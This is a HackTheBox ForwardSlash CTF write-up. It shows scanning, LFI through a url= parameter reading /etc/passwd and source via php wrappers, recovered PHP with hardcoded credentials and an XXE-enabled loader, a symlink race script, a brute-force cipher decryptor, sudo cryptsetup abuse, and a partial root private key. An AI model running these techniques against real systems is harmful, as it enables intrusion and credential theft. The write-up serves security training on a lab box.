HackTheBox - ForwardSlash ⚔️

HackTheBoxPenTesting
, , , , ,

HackTheBox-ForwardSlash

Quick Summary

→ A linux machine which vulnerable to LFI or Directory Traversal which the attacker can enumerate stuffs like file://etc/passwd using php-wrapper. With that method we can get the php-scripts that contains credentials of chiv and get in to machine with SSH. In privilege escalation part I need to get the second user Pain which need some cryptography knowledge to get the passphrase to open his backups file. In root part pain is have sudo privilege to run cryptsetup then I analyze the encrypter.py codes and made a simple script which decrypt the cyphertext then after executing I finally got the magic words for creating backups. from there I got the id_rsa keys of root.

Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → discover open ports and what services are running

  2. Enumeration

    → unning wfuzz to enumerate potential web directories

    → Found login and registration page

    → Create an account and login

    → In profile view we have an option to change profile picture

  3. Post - Exploitation

    → run wfuzz to enumerate subdomains

    → run gobuster to enumerate potential web directories and I found config.php

    → trying to upload any image and intercept the request

    → insert file:///etc/passwd in url parameter’ here we have local file inclusion

  4. Exploitation

    → read config.php via local file read

    → run dirsearch to search another web parameters’ and I found dev that has forbidden

    → with php-wrapper we can access dev/index.php converted to base64 code

    → decode and we can get php scripts that has credentials in it

    → login to SSH with user chiv

    → Privilege Escalation to get user pain

    → finally got the user.txt

  5. Privilege Escalation

    → Analyze the encrypter python file

    → make a script to decrypt the cyphertext

    → run the backups as have sudo privileges

    → mount the folder to mapped images & get rsa keys

    → Finally got the root.txt

Network Scanning

Walkthrough

→ I always begin at NMAP to look on the services what is running. I always use

  • -sV ⇒ Probe open ports to determine service/version info
  • -sC ⇒ equivalent to —script=default
  • -A- ⇒ Agressive scan
  • -oN ⇒ to save our scan results to a text file
# bash

nmap -sV -sC -A 10.10.10.183 -oN nmap-ForwardSlash

# bash

root in htb/boxes/ForwardSlash 
❯ nmap -sV -sC -A 10.10.10.183 -oN nmap-ForwardSlash
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 06:43 PST
Nmap scan report for 10.10.10.183
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
|   256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
|_  256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Did not follow redirect to http://forwardslash.htb
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/26%OT=22%CT=1%CU=31634%PV=Y%DS=2%DC=T%G=Y%TM=5EA4BD4
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=FE%GCD=1%ISR=110%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=
OS:M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE
OS:88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7
OS:%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=
OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%
OS:RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIP
OS:CK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   199.15 ms 10.10.14.1
2   197.28 ms 10.10.10.183

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.66 seconds

root in htb/boxes/ForwardSlash took 1m2s



Nmap results

So there’s only 2 port open.

  • 22 ⇒ which is running a SSH Client
  • 80 ⇒ which basically a web service

Enumeration

ForwardSlash Web

Since there’s web service I always looking that first :

HackTheBox-ForwardSlash

As you can see’ it seems that this website is hacked.

I run wfuzz if i can get subdomains so :

# bash

root in htb/boxes/ForwardSlash 
❯ wfuzz  --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt  -H 'Host: FUZZ.forwardslash.htb' -u http://10.10.10.183/

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.183/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                   
===================================================================

000000055:   302        0 L      6 W      33 Ch       "backup"                                                                                                                  
000000690:   400        12 L     53 W     422 Ch      "gc._msdcs"                                                                                                               

Total time: 151.6011
Processed Requests: 4997
Filtered Requests: 4995
Requests/sec.: 32.96148


root in htb/boxes/ForwardSlash took 2m32s



so there is http://backup.forwardslash.htb going on that it’s a register and login page .

HackTheBox-ForwardSlash

and the sign up page

HackTheBox-ForwardSlash

Create account

To test’ i created my account and I was able to change my profile picture’ one thing I can do with this is to upload an malicious image to gain reverse shell but it will not work on that .

HackTheBox-ForwardSlash

So by uploading image I try to intercept the request and I found a potential vulnerabilities which is the url= parameter.

I tried to input file:///etc/passwd and I can get right response

HackTheBox-ForwardSlash

Next i run gobuster to get another parameters :

Post - Exploitation

Web Enumeration

# bash


root in htb/boxes/ForwardSlash 
❯ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://backup.forwardslash.htb/ -o fslash-directories

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://backup.forwardslash.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,asp,aspx,jpg,txt,html
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/04/21 10:27:17 Starting gobuster
===============================================================
/index.php (Status: 200)
/login.php (Status: 200)
/register.php (Status: 200)
/welcome.php (Status: 200)
/dev (Status: 403)
/api.php (Status: 200)
/environment.php (Status: 200)
/logout.php (Status: 200)
/config.php (Status: 200)
/hof.php (Status: 200)

Exploitation

The hunt continuous

so there is /dev/ which 403 Status meaning it is forbidden or is not allowed & /config.php directory.

I tried to read config.php via local file inclusion and it returns web credentials.

HackTheBox-ForwardSlash

Bypass 403

Next is the /dev directory but we are not allowed to access so I search on google to bypass it and I found this on PayloadAllTheThings about php-wrapper

with that method we can convert it to base64 and decode it .

HackTheBox-ForwardSlash

here is the full base64 code I got :

# bash

PD9waHAKLy9pbmNsdWRlX29uY2UgLi4vc2Vzc2lvbi5waHA7Ci8vIEluaXRpYWxpemUgdGhlIHNlc3Npb24Kc2Vzc2lvbl9zdGFydCgpOwoKaWYoKCFpc3NldCgkX1NFU1NJT05bImxvZ2dlZGluIl0pIHx8ICRfU0VTU0lPTlsibG9nZ2VkaW4iXSAhPT0gdHJ1ZSB8fCAkX1NFU1NJT05bJ3VzZXJuYW1lJ10gIT09ICJhZG1pbiIpICYmICRfU0VSVkVSWydSRU1PVEVfQUREUiddICE9PSAiMTI3LjAuMC4xIil7CiAgICBoZWFkZXIoJ0hUVFAvMS4wIDQwMyBGb3JiaWRkZW4nKTsKICAgIGVjaG8gIjxoMT40MDMgQWNjZXNzIERlbmllZDwvaDE+IjsKICAgIGVjaG8gIjxoMz5BY2Nlc3MgRGVuaWVkIEZyb20gIiwgJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10sICI8L2gzPiI7CiAgICAvL2VjaG8gIjxoMj5SZWRpcmVjdGluZyB0byBsb2dpbiBpbiAzIHNlY29uZHM8L2gyPiIKICAgIC8vZWNobyAnPG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMzt1cmw9Li4vbG9naW4ucGhwIiAvPic7CiAgICAvL2hlYWRlcigibG9jYXRpb246IC4uL2xvZ2luLnBocCIpOwogICAgZXhpdDsKfQo/Pgo8aHRtbD4KCTxoMT5YTUwgQXBpIFRlc3Q8L2gxPgoJPGgzPlRoaXMgaXMgb3VyIGFwaSB0ZXN0IGZvciB3aGVuIG91ciBuZXcgd2Vic2l0ZSBnZXRzIHJlZnVyYmlzaGVkPC9oMz4KCTxmb3JtIGFjdGlvbj0iL2Rldi9pbmRleC5waHAiIG1ldGhvZD0iZ2V0IiBpZD0ieG1sdGVzdCI+CgkJPHRleHRhcmVhIG5hbWU9InhtbCIgZm9ybT0ieG1sdGVzdCIgcm93cz0iMjAiIGNvbHM9IjUwIj48YXBpPgogICAgPHJlcXVlc3Q+dGVzdDwvcmVxdWVzdD4KPC9hcGk+CjwvdGV4dGFyZWE+CgkJPGlucHV0IHR5cGU9InN1Ym1pdCI+Cgk8L2Zvcm0+Cgo8L2h0bWw+Cgo8IS0tIFRPRE86CkZpeCBGVFAgTG9naW4KLS0+Cgo8P3BocAppZiAoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT09ICJHRVQiICYmIGlzc2V0KCRfR0VUWyd4bWwnXSkpIHsKCgkkcmVnID0gJy9mdHA6XC9cL1tcc1xTXSpcL1wiLyc7CgkvLyRyZWcgPSAnLygoKCgyNVswLTVdKXwoMlswLTRdXGQpfChbMDFdP1xkP1xkKSkpXC4pezN9KCgoKDI1WzAtNV0pfCgyWzAtNF1cZCl8KFswMV0/XGQ/XGQpKSkpLycKCglpZiAocHJlZ19tYXRjaCgkcmVnLCAkX0dFVFsneG1sJ10sICRtYXRjaCkpIHsKCQkkaXAgPSBleHBsb2RlKCcvJywgJG1hdGNoWzBdKVsyXTsKCQllY2hvICRpcDsKCQllcnJvcl9sb2coIkNvbm5lY3RpbmciKTsKCgkJJGNvbm5faWQgPSBmdHBfY29ubmVjdCgkaXApIG9yIGRpZSgiQ291bGRuJ3QgY29ubmVjdCB0byAkaXBcbiIpOwoKCQllcnJvcl9sb2coIkxvZ2dpbmcgaW4iKTsKCgkJaWYgKEBmdHBfbG9naW4oJGNvbm5faWQsICJjaGl2IiwgJ04wYm9keUwxa2VzQmFjay8nKSkgewoKCQkJZXJyb3JfbG9nKCJHZXR0aW5nIGZpbGUiKTsKCQkJZWNobyBmdHBfZ2V0X3N0cmluZygkY29ubl9pZCwgImRlYnVnLnR4dCIpOwoJCX0KCgkJZXhpdDsKCX0KCglsaWJ4bWxfZGlzYWJsZV9lbnRpdHlfbG9hZGVyIChmYWxzZSk7CgkkeG1sZmlsZSA9ICRfR0VUWyJ4bWwiXTsKCSRkb20gPSBuZXcgRE9NRG9jdW1lbnQoKTsKCSRkb20tPmxvYWRYTUwoJHhtbGZpbGUsIExJQlhNTF9OT0VOVCB8IExJQlhNTF9EVERMT0FEKTsKCSRhcGkgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCSRyZXEgPSAkYXBpLT5yZXF1ZXN0OwoJZWNobyAiLS0tLS1vdXRwdXQtLS0tLTxicj5cclxuIjsKCWVjaG8gIiRyZXEiOwp9CgpmdW5jdGlvbiBmdHBfZ2V0X3N0cmluZygkZnRwLCAkZmlsZW5hbWUpIHsKICAgICR0ZW1wID0gZm9wZW4oJ3BocDovL3RlbXAnLCAncisnKTsKICAgIGlmIChAZnRwX2ZnZXQoJGZ0cCwgJHRlbXAsICRmaWxlbmFtZSwgRlRQX0JJTkFSWSwgMCkpIHsKICAgICAgICByZXdpbmQoJHRlbXApOwogICAgICAgIHJldHVybiBzdHJlYW1fZ2V0X2NvbnRlbnRzKCR0ZW1wKTsKICAgIH0KICAgIGVsc2UgewogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KfQoKPz4K

decode it and I got a php script :

# bash

<?php
//include_once ../session.php;
// Initialize the session
session_start();

if((!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true || $_SESSION['username'] !== "admin") && $_SERVER['REMOTE_ADDR'] !== "127.0.0.1"){
    header('HTTP/1.0 403 Forbidden');
    echo "<h1>403 Access Denied</h1>";
    echo "<h3>Access Denied From ", $_SERVER['REMOTE_ADDR'], "</h3>";
    //echo "<h2>Redirecting to login in 3 seconds</h2>"
    //echo '<meta http-equiv="refresh" content="3;url=../login.php" />';
    //header("location: ../login.php");
    exit;
}
?>
<html>
	<h1>XML Api Test</h1>
	<h3>This is our api test for when our new website gets refurbished</h3>
	<form action="/dev/index.php" method="get" id="xmltest">
		<textarea name="xml" form="xmltest" rows="20" cols="50"><api>
    <request>test</request>
</api>
</textarea>
		<input type="submit">
	</form>

</html>

<!-- TODO:
Fix FTP Login
-->

<?php
if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {

	$reg = '/ftp:\/\/[\s\S]*\/\"/';
	//$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'

	if (preg_match($reg, $_GET['xml'], $match)) {
		$ip = explode('/', $match[0])[2];
		echo $ip;
		error_log("Connecting");

		$conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");

		error_log("Logging in");

		if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {

			error_log("Getting file");
			echo ftp_get_string($conn_id, "debug.txt");
		}

		exit;
	}

	libxml_disable_entity_loader (false);
	$xmlfile = $_GET["xml"];
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$api = simplexml_import_dom($dom);
	$req = $api->request;
	echo "-----output-----<br>\r\n";
	echo "$req";
}

function ftp_get_string($ftp, $filename) {
    $temp = fopen('php://temp', 'r+');
    if (@ftp_fget($ftp, $temp, $filename, FTP_BINARY, 0)) {
        rewind($temp);
        return stream_get_contents($temp);
    }
    else {
        return false;
    }
}

?>


look the most interesting code line is it’s have credentials :


if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {

			error_log("Getting file");
			echo ftp_get_string($conn_id, "debug.txt");
		}

so the possible userame and password that we can use for SSH is username: chiv & password: N0bodyL1kesBack/

base on the code it use for ftp service but in our nmap scan we don’t have any ftp services so I tried to use it in SSH

Login via SSH

# bash

root in htb/boxes/ForwardSlash took 33s 
❯ ssh chiv@10.10.10.183
The authenticity of host '10.10.10.183 (10.10.10.183)' can't be established.
ECDSA key fingerprint is SHA256:7DrtoyB3GmTDLmPm01m7dHeoaPjA7+ixb3GDFhGn0HM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.183' (ECDSA) to the list of known hosts.
chiv@10.10.10.183's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Apr 26 19:47:37 UTC 2020

  System load:  0.09               Processes:            216
  Usage of /:   32.3% of 19.56GB   Users logged in:      1
  Memory usage: 28%                IP address for ens33: 10.10.10.183
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

16 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Apr 26 19:42:41 2020 from 10.10.15.230
chiv@forwardslash:~$ whoami
chiv
chiv@forwardslash:~$ hostname
forwardslash
chiv@forwardslash:~$


Privilege Escalation to Pain

Get user PAIN

inside Chiv directory there’s a note.txt

# bash

chiv@forwardslash:~$ ls
e223993ccd8840f3f3d72324d61219e6  exticute  note.txt
chiv@forwardslash:~$ cat note.txt
the executable file 'backup' already exists. on /usr/bin. To read a file with the executable, my solution was to create a symlink to the file you want to read. the executable 'backup' will read it if its name is correct. Find a way to get it named right
chiv@forwardslash:~$

it tells about the backup file, so I make a way to get pain I use LinEnum.sh 

# bash

chiv@forwardslash:/tmp$ wget http://10.10.14.4/LinEnum.sh
--2020-04-26 19:52:39--  http://10.10.14.4/LinEnum.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh                                     100%[===================================================================================================>]  45.54K  75.0KB/s    in 0.6s    

2020-04-26 19:52:40 (75.0 KB/s) - ‘LinEnum.sh’ saved [46631/46631]

chiv@forwardslash:/tmp$ bash LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sun Apr 26 19:52:46 UTC 2020                                                                                                                                                               
                                                                                                                                                                                           

### SYSTEM ##############################################
[-] Kernel information:
Linux forwardslash 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-91-generic (buildd@lgw01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS"
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic


[-] Hostname:
forwardslash


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(chiv) gid=1001(chiv) groups=1001(chiv)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/4    10.10.14.66      Sun Apr 26 19:33:04 +0000 2020
pain             pts/4    10.10.14.66      Sun Apr 26 19:26:11 +0000 2020
chiv             pts/6    10.10.14.4       Sun Apr 26 19:47:38 +0000 2020



[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 730 Mar 17 20:13 /var/backups/group.bak
-rw------- 1 root shadow 604 Mar 17 20:13 /var/backups/gshadow.bak
-rw------- 1 root shadow 1174 Mar  6 14:21 /var/backups/shadow.bak
-rw------- 1 root root 1660 Mar  5 14:46 /var/backups/passwd.bak
-rw------- 1 pain pain 526 Jun 21  2019 /var/backups/config.php.bak


here you can see the backups owned by pain going on that directory

# bash

chiv@forwardslash:/var/backups$ ls
alternatives.tar.0     apt.extended_states.1.gz  config.php.bak     dpkg.statoverride.0  group.bak    note.txt    recovery
apt.extended_states.0  apt.extended_states.2.gz  dpkg.diversions.0  dpkg.status.0        gshadow.bak  passwd.bak  shadow.bak
chiv@forwardslash:/var/backups$

there’s another note.txt

# bash

chiv@forwardslash:/var/backups$ cat note.txt
Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH.

-Pain
chiv@forwardslash:/var/backups$

So the backups may contains the password of our target, to automate the attack I create a simple bash script to get make backups and get the md5sum of that timestamp and get that link and try backup again .

# bash

i=$(backup | grep ERROR | awk '{print $2}');
ln -s /var/backups/config.php.bak  ./$i;
backup;

running this :

# bash

chiv@forwardslash:/var/backups$ bash /tmp/exploit.sh
ln: failed to create symbolic link './cdaf08a855c7502448ac0a89501be28c': Permission denied
----------------------------------------------------------------------
        Pain's Next-Gen Time Based Backup Viewer
        v0.1
        NOTE: not reading the right file yet, 
        only works if backup is taken in same second
----------------------------------------------------------------------

Current Time: 20:23:39
ERROR: cdaf08a855c7502448ac0a89501be28c Does Not Exist or Is Not Accessible By Me, Exiting...
chiv@forwardslash:/var/backups$

At first it failed, I tried to run it again and finally :

# bash

chiv@forwardslash:~$ bash /tmp/exploit.sh
90c0700e7f02944c879196b194727e7b
----------------------------------------------------------------------
        Pain's Next-Gen Time Based Backup Viewer
        v0.1
        NOTE: not reading the right file yet, 
        only works if backup is taken in same second
----------------------------------------------------------------------

Current Time: 20:49:34
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');
 
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
chiv@forwardslash:~$


Get user.txt

Now that i have the password of pain we can now get the user.txt flag :

# bash

chiv@forwardslash:~$ su pain
Password: 
pain@forwardslash:/home/chiv$ cd ..
pain@forwardslash:/home$ ls
chiv  pain
pain@forwardslash:/home$ cd pain
pain@forwardslash:~$ ls
encryptorinator  note.txt  user.txt
pain@forwardslash:~$ cut -c 4-12 user.txt
228bcc4e7
pain@forwardslash:~$


Privilege Escalation

Cryptography

Inside pain’s directory there’s another notes by chiv

# bash

pain@forwardslash:~$ ls
encryptorinator  note.txt  user.txt
pain@forwardslash:~$ cat note.txt 
Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key... I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.

-chiv
pain@forwardslash:~$

I notice that pain can run below the following commands that have sudo privileges without password

# bash

pain@forwardslash:~$ sudo -l
Matching Defaults entries for pain on forwardslash:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pain may run the following commands on forwardslash:
    (root) NOPASSWD: /sbin/cryptsetup luksOpen *
    (root) NOPASSWD: /bin/mount /dev/mapper/backup ./mnt/
    (root) NOPASSWD: /bin/umount ./mnt/


let’s take a look at cyphertext file & and encrypter.py inside pain’s folder :

Cyphertext

# sh

Ë×£›”,Lö
>¼2XÕ¢Š
|Š? IÇ)ñEƒ-—Ë’\/;ÃDzyÆ[w#M’÷2ÊÑ~çY@'¶ç¼˜Š…æ³£,ˆëÛôP™º@5†Àf$ù\*r¢wFº’3¸gïX¿}Éi6ð´‹ô~ßK‹©YðÅŽ¥‘ÿ'%¿eà>à®xÝoä+gÜ/±K¬>ÿ^ÝËV¥÷âN°kŠ¿e

Encrypter

# python

def encrypt(key, msg):
    key = list(key)
    msg = list(msg)
    for char_key in key:
        for i in range(len(msg)):
            if i == 0:
                tmp = ord(msg[i]) + ord(char_key) + ord(msg[-1])
            else:
                tmp = ord(msg[i]) + ord(char_key) + ord(msg[i-1])

            while tmp > 255:
                tmp -= 256
            msg[i] = chr(tmp)
    return ''.join(msg)

def decrypt(key, msg):
    key = list(key)
    msg = list(msg)
    for char_key in reversed(key):
        for i in reversed(range(len(msg))):
            if i == 0:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[-1]))
            else:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[i-1]))
            while tmp < 0:
                tmp += 256
            msg[i] = chr(tmp)
    return ''.join(msg)


print encrypt('REDACTED', 'REDACTED')
print decrypt('REDACTED', encrypt('REDACTED', 'REDACTED'))


Decrypt

by analyzing this code’ the function applies each character of the key as a mask sequentially for each character of the message. So I created a python script to reverse engineer the code to decrypt the cyphertext

# python3

#!/usr/bin/python

from Crypto import Random
from Crypto.Cipher import AES

def decrypt(key, msg):
    key = list(key)
    msg = list(msg)
    for char_key in reversed(key):
        for i in reversed(range(len(msg))):
            if i == 0:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[-1]))
            else:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[i-1]))
            while tmp < 0:
                tmp += 256
            msg[i] = chr(tmp)
    return ''.join(msg)


ciphertext = open('ciphertext', 'r').read().rstrip()
for i in range(1, 165):
    for j in range(33, 127):
        key = chr(j) * i
        msg = decrypt(key, ciphertext)
        if 'the ' in msg or 'be ' in msg or 'and ' in msg or 'of ' in msg :
            exit("Key: {0}, Key length: {1}, Msg: {2}".format(key, len(key), msg))

From my Kali I transfer it to target machine and execute :

# bash


pain@forwardslash:~/encryptorinator$ wget http://10.10.14.114/decrypt.py
--2020-04-29 00:05:55--  http://10.10.14.114/decrypt.py
Connecting to 10.10.14.114:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 833 [text/plain]
Saving to: ‘decrypt.py’

decrypt.py                                     100%[===================================================================================================>]     833  --.-KB/s    in 0s      

2020-04-29 00:05:55 (95.1 MB/s) - ‘decrypt.py’ saved [833/833]

pain@forwardslash:~/encryptorinator$

it takes only a second to get the magic word cB!6%sdH8Lj^@Y*$C2cf :

# bash

pain@forwardslash:~/encryptorinator$ chmod +x decrypt.py 
pain@forwardslash:~/encryptorinator$ ./decrypt.py 
Key: ttttttttttttttttt, Key length: 17, Msg: Hl��vF��;�������&you liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf
pain@forwardslash:~/encryptorinator$


Next is to go /backup folder which allowed to run sudo privileges :

# bash

pain@forwardslash:~$ cd /var/
pain@forwardslash:/var$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www
pain@forwardslash:/var$ cd backups
pain@forwardslash:/var/backups$ ls
alternatives.tar.0     apt.extended_states.1.gz  config.php.bak     dpkg.statoverride.0  group.bak    note.txt    recovery
apt.extended_states.0  apt.extended_states.2.gz  dpkg.diversions.0  dpkg.status.0        gshadow.bak  passwd.bak  shadow.bak
pain@forwardslash:/var/backups$ cd recovery
pain@forwardslash:/var/backups/recovery$ ls
encrypted_backup.img
pain@forwardslash:/var/backups/recovery$ ls -la
total 976576
drwxrwx--- 2 root backupoperator       4096 May 27  2019 .
drwxr-xr-x 3 root root                 4096 Mar 24 10:10 ..
-rw-r----- 1 root backupoperator 1000000000 Apr 28 23:58 encrypted_backup.img
pain@forwardslash:/var/backups/recovery$


Now it’s time to execute it and insert the passphrase cB!6%sdH8Lj^@Y*$C2cf :

# bash

pain@forwardslash:/var/backups/recovery$ sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
Enter passphrase for /var/backups/recovery/encrypted_backup.img: 
pain@forwardslash:/var/backups/recovery$ ls
encrypted_backup.img
pain@forwardslash:/var/backups/recovery$


Now we need to head towards /dev/mapper To check for mapped images :

# bash

pain@forwardslash:~$ sudo /bin/mount /dev/mapper/backup ./mnt/
pain@forwardslash:~$ ls
encryptorinator  mnt  note.txt  user.txt
pain@forwardslash:~$ cd mnt
pain@forwardslash:~/mnt$ ls
id_rsa
pain@forwardslash:~/mnt$

inside ./mnt folder there’s id_rsa

# bash

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA9i/r8VGof1vpIV6rhNE9hZfBDd3u6S16uNYqLn+xFgZEQBZK
RKh+WDykv/gukvUSauxWJndPq3F1Ck0xbcGQu6+1OBYb+fQ0B8raCRjwtwYF4gaf
yLFcOS111mKmUIB9qR1wDsmKRbtWPPPvgs2ruafgeiHujIEkiUUk9f3WTNqUsPQc
u2AG//ZCiqKWcWn0CcC2EhWsRQhLOvh3pGfv4gg0Gg/VNNiMPjDAYnr4iVg4XyEu
NWS2x9PtPasWsWRPLMEPtzLhJOnHE3iVJuTnFFhp2T6CtmZui4TJH3pij6wYYis9
MqzTmFwNzzx2HKS2tE2ty2c1CcW+F3GS/rn0EQIDAQABAoIBAQCPfjkg7D6xFSpa
V+rTPH6GeoB9C6mwYeDREYt+lNDsDHUFgbiCMk+KMLa6afcDkzLL/brtKsfWHwhg
G8Q+u/8XVn/jFAf0deFJ1XOmr9HGbA1LxB6oBLDDZvrzHYbhDzOvOchR5ijhIiNO
3cPx0t1QFkiiB1sarD9Wf2Xet7iMDArJI94G7yfnfUegtC5y38liJdb2TBXwvIZC
vROXZiQdmWCPEmwuE0aDj4HqmJvnIx9P4EAcTWuY0LdUU3zZcFgYlXiYT0xg2N1p
MIrAjjhgrQ3A2kXyxh9pzxsFlvIaSfxAvsL8LQy2Osl+i80WaORykmyFy5rmNLQD
Ih0cizb9AoGBAP2+PD2nV8y20kF6U0+JlwMG7WbV/rDF6+kVn0M2sfQKiAIUK3Wn
5YCeGARrMdZr4fidTN7koke02M4enSHEdZRTW2jRXlKfYHqSoVzLggnKVU/eghQs
V4gv6+cc787HojtuU7Ee66eWj0VSr0PXjFInzdSdmnd93oDZPzwF8QUnAoGBAPhg
e1VaHG89E4YWNxbfr739t5qPuizPJY7fIBOv9Z0G+P5KCtHJA5uxpELrF3hQjJU8
